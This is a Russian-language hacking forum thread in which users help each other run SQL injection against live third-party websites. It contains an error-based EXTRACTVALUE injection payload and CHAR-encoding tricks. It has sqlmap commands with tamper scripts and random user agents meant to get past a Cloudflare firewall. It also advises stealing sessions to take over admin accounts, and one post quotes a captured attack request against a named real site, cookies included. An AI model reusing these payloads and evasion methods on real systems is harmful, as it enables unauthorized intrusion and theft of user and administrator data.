чёрт.... стой стой, ты же говоришь исходники читал? так структуру базы знаешь получается? зачем information_schema тогда? максимум префикс только узнать к таблицам
название таблицы включает в себя нижнее подчеркивание, а подчеркивание заменяется на запятую если бы можно составить запрос где название таблицы будет закодировано (hex, base64), но в таких узких запросах не силен
использую это http://www.waraxe.us/sql-char-encoder.html делаю запрос вида cat=93) AND EXTRACTVALUE(1660,CONCAT(0x5c,0x71707a7671,(SELECT MID((DATABASE()),1,50)),(SELECT 123))) AND (1749=1749 Выводится... Notice: Error: XPATH syntax error: '\qpzvqНАЗВАНИЕ_БД123' вместо (SELECT 123) пробую (SELECT username FROM CONCAT(CHAR(116),CHAR(98),CHAR(108),CHAR(95),CHAR(117),CHAR(115),CHAR(101),CHAR(114),CHAR(115))) не проходит запрос - ошибка
не хочу показаться грубым, но куда все спешат? куда черт подери все не успевают??! доставать базу через boolen? да, тут можно рехнуться, потому что это извращение, не надо этим заниматься вам нужна толька база? хотите получить выгоду? тогда мне нечем помочь получайте наслаждение от того что делаете, в этом суть был случай, читал файлы с сервера через time-based самописным скриптом, ещё и слипы ставил чтобы не спалится, крупный был ресурс, очень хотелось и знаете что, это было здорово, это было чертовски здорово вам нужен один два максимум пять записей из базы, прощупать тот ли вектор, в правильном ли направление идёт процесс
у sqlmap'а есть ещё тампер для limit - commalesslimit можно посмотреть запрос который валится из за запятых? подробный вывод если что опция -v 3
Такая печаль ребята, Нашел тайм байсед блинд скуль на одном саенте, там стоит ваф клоудфлейр. заюзал темпер скрипты, все слиается-подбирается, все хорошо. НО при попытке слить из таблицы юзеров -- админ акки, или вообще пересчитать колонки этой таблицы -- получаю 503 еррор. Прокси юзал. Кто сталкивался? Как решить? Code: ./sqlmap.py -r site.hed -D db -T user --count -v 3 --tamper="between,randomcase,space2comment" --random-agent --no-cast --time-sec=10 Code: [DEBUG] got HTTP error code: 503 (Service Unavailable)
таблица юзеров вся не читается или только админские акки? можно копипаст запрос-ответа от -v 3 ? ------------- на таблицу юзеров могут права другие быть, для нее отдельный мускуль пользователь например создан файлы не читаются?
Не, файлы не читаются. Конкретной из этой таблицы имена колонок могу получить, поля -- нет, из других могу.
вангую что доступа таки нет, скрипт валится с ошибок access denied, отсюда 503 ------------------ чекни есть ли таблица с сессиями, иногда пасс и не нужен, можно тиснуть сессию
Подскажите, что можно выжать из ситуации: запрос: www.site.com/search?searchword=lala"+AND+9815%3D8835 Ответ: No valid database connection You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%" OR (rv.field_value like "%lala"%" AND f.searchable = 1)) AND a.type_id IN (2)' at line 11 SQL=SELECT a.client, a.client_id, a.id, a.type_id, a.user_id, a.title, rc.catid, "*" AS text, a.ctime AS created, "2" AS browsernav, IF( s.name != "", CONCAT("Type: ", t.name, " | " , " Section: ", s.name, " | " , " Category: ", GROUP_CONCAT( DISTINCT c.name SEPARATOR ", ") ), CONCAT("Type: ", t.name, " | " , " Section: ", GROUP_CONCAT( DISTINCT c.name SEPARATOR ", ") ) ) AS section FROM jos_js_res_record AS a LEFT JOIN jos_js_res_types AS t ON t.id = a.type_id LEFT JOIN jos_js_res_record_category AS rc ON rc.record_id = a.id LEFT JOIN jos_js_res_category AS c ON c.id = rc.catid LEFT JOIN jos_js_res_category AS s ON s.id = c.section_id LEFT JOIN jos_js_res_record_values AS rv ON rv.record_id = a.id LEFT JOIN jos_js_res_fields AS f ON f.id = rv.field_id WHERE ((a.title like "%lala"%" OR (rv.field_value like "%lala"%" AND f.searchable = 1)) AND a.type_id IN (2) AND f.published AND a.published = 1 AND c.published = 1) AND ((a.title like "%9815=8835%" OR (rv.field_value like "%9815=8835%" AND f.searchable = 1)) AND a.type_id IN (2) AND f.published AND a.published = 1 AND c.published = 1) GROUP BY a.id LIMIT 0, 50 Сразу задам второй вопрос: в параметре search ограничение 20 символов. Проверка происходит на стороне сервера. Есть пусти обхода? SQLmap не видит, что параметр уязвим.
POST (multipart) input orderby was set to 1'" Error message found: You have an error in your SQL syntax Пробую вот так: sqlmap.py -r "C:\site.txt" --random-ag В site.txt : POST / HTTP/1.1 Content-Length: 1439 Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_TFWLMOFXSC Referer: http://www.admir.kz/ Cookie: bestbuyplanet=201607042017315d3489f5e81da776b9e9e1fad1808e87; astratop=1; s=1; ruid=Nq0eBkuZBldOBQAAAexeag==; top100rb=NjczKzY3Ng==; _ym_uid=1460050539758942208; yabs-vdrf=A0; _ym_isad=2; VISID=TTEFYBEBKWRPXCLTMU; _ym_visorc_13406191=w Host: www.admir.kz Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* -------AcunetixBoundary_TFWLMOFXSC Content-Disposition: form-data; name="BannerPlace" -------AcunetixBoundary_TFWLMOFXSC Content-Disposition: form-data; name="category" -------AcunetixBoundary_TFWLMOFXSC Content-Disposition: form-data; name="contenttype" ResourceOffer -------AcunetixBoundary_TFWLMOFXSC Content-Disposition: form-data; name="filterMode" -------AcunetixBoundary_TFWLMOFXSC Content-Disposition: form-data; name="location" kazakhstan -------AcunetixBoundary_TFWLMOFXSC Content-Disposition: form-data; name="next" -------AcunetixBoundary_TFWLMOFXSC Content-Disposition: form-data; name="orderby*" 1'" -------AcunetixBoundary_TFWLMOFXSC Content-Disposition: form-data; name="page" -------AcunetixBoundary_TFWLMOFXSC Content-Disposition: form-data; name="PageName" -------AcunetixBoundary_TFWLMOFXSC Content-Disposition: form-data; name="pagesMethod" post -------AcunetixBoundary_TFWLMOFXSC Content-Disposition: form-data; name="PageTitle" -------AcunetixBoundary_TFWLMOFXSC Content-Disposition: form-data; name="ResourceCategoryGroup" ad -------AcunetixBoundary_TFWLMOFXSC Content-Disposition: form-data; name="ResourceCategoryID" -------AcunetixBoundary_TFWLMOFXSC Content-Disposition: form-data; name="SID" classifieds -------AcunetixBoundary_TFWLMOFXSC Content-Disposition: form-data; name="treeType" -------AcunetixBoundary_TFWLMOFXSC-- Не находит sql что делаю не так?
